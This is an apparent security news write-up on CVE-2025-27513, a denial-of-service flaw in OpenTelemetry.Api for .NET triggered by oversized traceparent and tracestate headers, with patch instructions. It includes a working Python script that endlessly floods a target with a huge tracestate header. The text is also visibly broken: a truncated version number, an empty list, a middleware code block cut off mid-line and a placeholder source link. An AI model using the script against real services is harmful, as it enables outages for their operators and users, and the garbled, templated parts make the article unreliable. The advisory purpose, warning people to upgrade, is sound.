CVE CyberSecurity Database News

CVE-2025-27513 - Denial of Service in OpenTelemetry .NET via Malicious Trace Headers

Poster -

OpenTelemetry has become a vital tool for monitoring and tracing distributed systems. However, when a vulnerability appears in such a widely used observability framework, the damage can be significant. Recently, CVE-2025-27513 was disclosed affecting the OpenTelemetry.Api package for .NET, versions 1.10. through 1.11.1. If you're running any .NET web application or backend with OpenTelemetry, or even if you only have the package installed, you must read on.

What is the Vulnerability?

Simply put, if your application processes HTTP requests – even if it doesn't use OpenTelemetry trace propagation – it may be vulnerable to a Denial of Service (DoS) attack. This attack works by sending specially-crafted traceparent and tracestate headers to your application. The way OpenTelemetry.Api parsed and handled these headers in vulnerable versions led to excessive CPU usage, potentially grinding the whole application down.

Sources

- GitHub Security Advisory - OpenTelemetry .NET *(example URL, replace with actual)*
- NVD: CVE-2025-27513

Who Is Affected?

Any .NET application that references OpenTelemetry.Api version 1.10. to 1.11.1 and listens to HTTP requests — *even if it doesn’t explicitly use trace propagation* — is at risk. This includes:

Exploiting the Bug: How the Attack Works

The attack is simple enough for any malicious actor. By sending requests with *malformed* or excessively long tracestate and traceparent headers, the attacker can trigger CPU-intensive parsing routines in the vulnerable package. The result? Increased latency, degraded performance, and possibly full application downtime.

Here's a simplified Python script using requests to repeatedly target a .NET application

import requests

url = "http://victim-app.local/api/resource";

headers = {
    "traceparent": "00-4bf92f3577b34da6a3ce929dee4736-00f067aaba902b7-01",
    "tracestate": ",".join(["a=longvaluedata"] * 100000)  # Large, repeated entries
}

while True:
    response = requests.get(url, headers=headers)
    print(f"Status: {response.status_code}")

This floods the server with calls, each having a huge (potentially infinite) tracestate header. In vulnerable versions, the API package would not efficiently terminate parsing, leading to excessive resource use.

How to Fix

Patch Immediately: Upgrade your OpenTelemetry.Api dependency to version 1.11.2 or above.

In your .csproj

<ItemGroup>
    <PackageReference Include="OpenTelemetry.Api" Version="1.11.2" />
</ItemGroup>

Or via NuGet CLI

dotnet add package OpenTelemetry.Api --version 1.11.2

If you cannot patch immediately

1. Filter or Remove Trust for Trace Headers: Use middleware to strip incoming traceparent and tracestate headers, like this:

app.Use(async (context, next) =>

{

Conclusion

Do not ignore CVE-2025-27513. Even if you don't think you're using trace propagation, simply having the vulnerable OpenTelemetry.Api package can put your apps at risk. Update your dependencies, review your incoming HTTP traffic, and stay alert to future advisories.

Further Reading

- OpenTelemetry .NET Releases
- CVE Details for CVE-2025-27513

Timeline

Published on: 03/05/2025 19:15:39 UTC